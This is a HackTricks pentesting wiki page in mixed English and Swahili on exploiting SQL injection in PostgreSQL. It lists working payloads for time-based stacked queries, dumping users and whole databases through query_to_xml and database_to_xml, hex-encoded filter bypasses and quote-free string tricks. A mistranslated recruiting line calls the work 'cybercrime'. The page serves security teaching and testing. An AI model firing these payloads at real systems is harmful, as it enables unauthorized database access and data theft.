Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

PostgreSQL injection

Support HackTricks

If you are interested in hacking career and hack the unhackable - we are hiring! (kuandika na kuzungumza kwa Kiswahili ni lazima).

This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md

Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration

The PostgreSQL module dblink offers capabilities for connecting to other PostgreSQL instances and executing TCP connections. These features, combined with the COPY FROM functionality, enable actions like privilege escalation, port scanning, and NTLM challenge response capture. For detailed methods on executing these attacks check how to perform these attacks.

Exfiltration example using dblink and large objects

You can read this example to see a CTF example of how to load data inside large objects and then exfiltrate the content of large objects inside the username of the function dblink_connect.

PostgreSQL Attacks: Read/write, RCE, privesc

Check how to compromise the host and escalate privileges from PostgreSQL in:

5432,5433 - Pentesting Postgresql

WAF bypass

PostgreSQL String functions

Manipulating strings could help you to bypass WAFs or other restrictions. In this page you can find some useful Strings functions.

Stacked Queries

Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XML tricks

query_to_xml

Hii kazi itarudisha data zote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kutupa data nyingi katika safu moja tu:

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

Hii kazi itatoa hifadhidata nzima katika muundo wa XML kwa mstari 1 tu (kuwa makini ikiwa hifadhidata ni kubwa sana kwani unaweza kuisababisha DoS au hata mteja wako mwenyewe):

SELECT database_to_xml(true,true,'');

Strings in Hex

Ikiwa unaweza kuendesha queries ukipitia ndani ya string (kwa mfano kutumia query_to_xml function). Unaweza kutumia convert_from kupitisha string kama hex na kupita filters kwa njia hii:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

Nukuu zilizokatazwa

Ikiwa huwezi kutumia nukuu kwa payload yako unaweza kupita hii kwa CHR kwa masharti ya msingi (kuunganisha wahusika kunafanya kazi tu kwa maswali ya msingi kama vile SELECT, INSERT, DELETE, nk. Hakiwezi kufanya kazi kwa taarifa zote za SQL):

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Au na $. Hizi maswali yanarudisha matokeo sawa:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

Ikiwa unavutiwa na kazi ya uhalifu wa mtandao na kujaribu kuvunja yasiyovunjika - tunatafuta wafanyakazi! (kuandika na kuzungumza kwa ufasaha Kiswahili kunahitajika).

Support HackTricks
PreviousCypher Injection (neo4j)Nextdblink/lo_import data exfiltration

Last updated